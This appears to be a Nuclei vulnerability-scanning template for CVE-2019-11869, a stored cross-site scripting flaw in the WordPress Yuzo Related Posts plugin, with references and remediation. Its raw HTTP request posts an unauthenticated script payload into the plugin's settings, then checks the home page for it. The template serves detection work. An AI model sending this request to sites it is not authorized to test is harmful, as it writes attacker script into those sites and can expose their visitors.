WordPress Yuzo <5.12.94 - Cross-Site Scripting

id: CVE-2019-11869

info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.0018
    epss-percentile: 0.55101
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro

http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4a0a00473045022100f262415dcc61709d8131f774eb669f755f68c700968d3fa28706ed6b3e1cef040220617983e4d93971bf21800af6aa075e295f45b1217ea3c05fb47153aefa81d3f9:922c64590222798bb761d5b6d8e72950